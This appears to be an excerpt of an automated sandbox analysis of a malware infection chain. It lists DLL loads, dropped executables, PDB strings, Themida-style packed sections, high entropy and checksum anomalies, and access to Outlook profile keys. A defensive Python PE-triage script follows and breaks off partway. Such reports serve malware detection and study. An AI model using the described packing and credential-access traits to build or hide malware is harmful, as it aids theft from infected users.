Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 1CMweaqlKp.exe Static file information: File size 1793040 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 1CMweaqlKp.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x185000
Source: Binary string: freebl3.pdb source: freebl3[1].dll.51.dr
Source: Binary string: C:\wutimosolix_62\gowaj\tosusinana-la.pdb source: ISetup8.exe, 00000029.00000003.2151074345.0000000003871000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000000.2149099984.0000000000412000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.51.dr
Source: Binary string: C:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: file300un.PDBI: source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: Croco.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: YC:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: ,C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: pC:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb4 source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: GC:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: System.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdb source: WERA6A7.tmp.dmp.34.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Unpacked PE file: 7.2.amert.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Unpacked PE file: 9.2.d361f35322.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 11.2.explorha.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 27.2.MPGPH131.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Unpacked PE file: 36.2.d361f35322.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 46.2.RageMP131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: jok[1].exe.10.dr Static PE information: 0xFC177629 [Thu Jan 10 08:13:29 2104 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .boot
Source: jok.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x547e4
Source: cred64[1].dll.10.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: swiiiii[1].exe.10.dr Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: sarra[1].exe.1.dr Static PE information: real checksum: 0x255044 should be: 0x255765
Source: amert.exe.1.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: clip64.dll.10.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: jok[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x547e4
Source: install.exe.10.dr Static PE information: real checksum: 0x22d33 should be: 0x44be5e
Source: swiiii.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x32780
Source: install[1].exe.10.dr Static PE information: real checksum: 0x22d33 should be: 0x44be5e
Source: cred64.dll.10.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: clip64[1].dll.10.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: NewB.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: MPGPH131.exe.9.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: explorha.exe.7.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: gold.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x9cfd4
Source: swiiii[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x32780
Source: amert[1].exe.1.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: RageMP131.exe.9.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: NewB[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: d361f35322.exe.1.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: gold[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x9cfd4
Source: alexxxxxxxx.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x2b7dd5
Source: alexxxxxxxx[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x2b7dd5
Source: swiiiii.exe.10.dr Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: random[1].exe.1.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name: .vm_sec
Source: 1CMweaqlKp.exe Static PE information: section name: .themida
Source: 1CMweaqlKp.exe Static PE information: section name: .boot
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name: .vm_sec
Source: explorta.exe.0.dr Static PE information: section name: .themida
Source: explorta.exe.0.dr Static PE information: section name: .boot
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: .idata
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: zhbidvgs
Source: sarra[1].exe.1.dr Static PE information: section name: swmxyxsi
Source: sarra[1].exe.1.dr Static PE information: section name: .taggant
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: .idata
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: avcjhwxy
Source: amert[1].exe.1.dr Static PE information: section name: nkwkrymv
Source: amert[1].exe.1.dr Static PE information: section name: .taggant
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: .idata
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: avcjhwxy
Source: amert.exe.1.dr Static PE information: section name: nkwkrymv
Source: amert.exe.1.dr Static PE information: section name: .taggant
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: .idata
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: agovwish
Source: random[1].exe.1.dr Static PE information: section name: lcjgmmfi
Source: random[1].exe.1.dr Static PE information: section name: .taggant
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: .idata
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: agovwish
Source: d361f35322.exe.1.dr Static PE information: section name: lcjgmmfi
Source: d361f35322.exe.1.dr Static PE information: section name: .taggant
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: .idata
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: avcjhwxy
Source: explorha.exe.7.dr Static PE information: section name: nkwkrymv
Source: explorha.exe.7.dr Static PE information: section name: .taggant
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: .idata
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: agovwish
Source: RageMP131.exe.9.dr Static PE information: section name: lcjgmmfi
Source: RageMP131.exe.9.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: .idata
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: agovwish
Source: MPGPH131.exe.9.dr Static PE information: section name: lcjgmmfi
Source: MPGPH131.exe.9.dr Static PE information: section name: .taggant
Source: gold[1].exe.10.dr Static PE information: section name: .DAX
Source: gold[1].exe.10.dr Static PE information: section name: .Left
Source: gold[1].exe.10.dr Static PE information: section name: .INV
Source: gold.exe.10.dr Static PE information: section name: .DAX
Source: gold.exe.10.dr Static PE information: section name: .Left
Source: gold.exe.10.dr Static PE information: section name: .INV
Source: cred64[1].dll.10.dr Static PE information: section name: _RDATA
Source: cred64.dll.10.dr Static PE information: section name: _RDATA
Source: alexxxxxxxx[1].exe.10.dr Static PE information: section name: .00cfg
Source: alexxxxxxxx.exe.10.dr Static PE information: section name: .00cfg
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00813F49 push ecx; ret 9_2_00813F5C
Source: 1CMweaqlKp.exe Static PE information: section name: entropy: 7.9986661792698115
Source: 1CMweaqlKp.exe Static PE information: section name: .boot entropy: 7.955810157618839
Source: explorta.exe.0.dr Static PE information: section name: entropy: 7.9986661792698115
Source: explorta.exe.0.dr Static PE information: section name: .boot entropy: 7.955810157618839
Source: sarra[1].exe.1.dr Static PE information: section name: entropy: 7.9243513655231705
Source: sarra[1].exe.1.dr Static PE information: section name: zhbidvgs entropy: 7.912044560062752
Source: amert[1].exe.1.dr Static PE information: section name: entropy: 7.986768487395881
Source: amert[1].exe.1.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: amert.exe.1.dr Static PE information: section name: entropy: 7.986768487395881
Source: amert.exe.1.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: random[1].exe.1.dr Static PE information: section name: entropy: 7.924280236056968
Source: random[1].exe.1.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: d361f35322.exe.1.dr Static PE information: section name: entropy: 7.924280236056968
Source: d361f35322.exe.1.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: explorha.exe.7.dr Static PE information: section name: entropy: 7.986768487395881
Source: explorha.exe.7.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: RageMP131.exe.9.dr Static PE information: section name: entropy: 7.924280236056968
Source: RageMP131.exe.9.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: MPGPH131.exe.9.dr Static PE information: section name: entropy: 7.924280236056968
Source: MPGPH131.exe.9.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: swiiiii[1].exe.10.dr Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiiii.exe.10.dr Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiii[1].exe.10.dr Static PE information: section name: .text entropy: 7.987813915261593
Source: swiiii.exe.10.dr Static PE information: section name: .text entropy: 7.987813915261593
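The "real checksum ... should be", future TimeDateStamp, unnamed/random/packer section name and section entropy lines above are all cheap static checks that can be reproduced outside the sandbox. The following is an added example, not part of the Joe Sandbox report and not the malware's code: it recomputes IMAGE_OPTIONAL_HEADER.CheckSum with the imagehlp algorithm, decodes the build timestamp, flags section names (the ".themida/.vm_sec/.boot/.taggant" set and the common-name list are taken from this report and ordinary linker output; the 7.0 entropy threshold is an assumed cut-off), and runs these checks over a small PE32 constructed inline with the same traits the dropped files show (stored checksum 0, timestamp 0xFC177629, an unnamed RWX section, a section named "agovwish", a ".themida" section). Standard library only.

```python
"""Static PE triage: CheckSum recomputation, TimeDateStamp sanity, section names, entropy.
Added example for this report; the sample PE below is constructed, not a dropped file."""
import math
import struct
from datetime import datetime, timedelta, timezone

PACKER_SECTIONS = {".themida", ".vm_sec", ".boot", ".taggant"}        # names seen in this report
COMMON_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                   ".pdata", ".tls", ".bss", ".crt", "_rdata", ".00cfg"}
HIGH_ENTROPY = 7.0                       # assumed threshold; packed/encrypted data is close to 8.0


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes) -> int:
    """CheckSum as imagehlp's CheckSumMappedFile computes it: add the file as little-endian
    DWORDs with end-around carry, skipping the CheckSum field, fold to 16 bits, add the
    unpadded length. Assumes the 4-byte-aligned e_lfanew that real linkers emit."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    checksum_off = e_lfanew + 24 + 64          # PE signature + FILE_HEADER + OptionalHeader+0x40
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def parse_pe(data: bytes):
    """Return (stored_checksum, timestamp, [(section_name, raw_bytes), ...])."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    n_sections, timestamp, _, _, opt_size = struct.unpack_from("<HIIIH", data, e_lfanew + 6)
    stored = struct.unpack_from("<I", data, e_lfanew + 24 + 64)[0]
    sections, off = [], e_lfanew + 24 + opt_size
    for _ in range(n_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        sections.append((name.rstrip(b"\0").decode("latin-1"), data[raw_ptr:raw_ptr + raw_size]))
        off += 40
    return stored, timestamp, sections
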